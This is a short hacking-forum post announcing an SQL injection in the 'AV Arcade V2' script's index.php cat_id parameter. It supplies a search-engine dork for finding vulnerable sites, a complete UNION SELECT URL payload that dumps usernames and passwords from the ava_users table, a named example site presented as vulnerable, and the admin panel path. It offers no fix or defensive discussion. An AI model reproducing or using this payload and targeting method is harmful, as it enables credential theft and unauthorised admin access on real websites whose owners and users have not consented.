Jump to content
Ras

AV Arcade V2(index.php cat_id) Sql Injection

Recommended Posts

Posted
Site : [url]www.avscripts.net[/url]
Dork : "Powered By AV Arcade"

Exploit: http://site.com/index.php?cat_id=NumOfCatgorey/**/union/**/select/**/1,concat(char(32,%2032,%2032,%2032,%2032,%2032,%2032,%2032,32,32,32,32,32),username,char(58,58,58),password)/**/from/**/ava_users/**/where%20id=Uid

Example: [url]http://www.gotovski.cool-bg.co.uk[/url]
Admin Panel : site.com/admin/

Found By : WaReZ

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...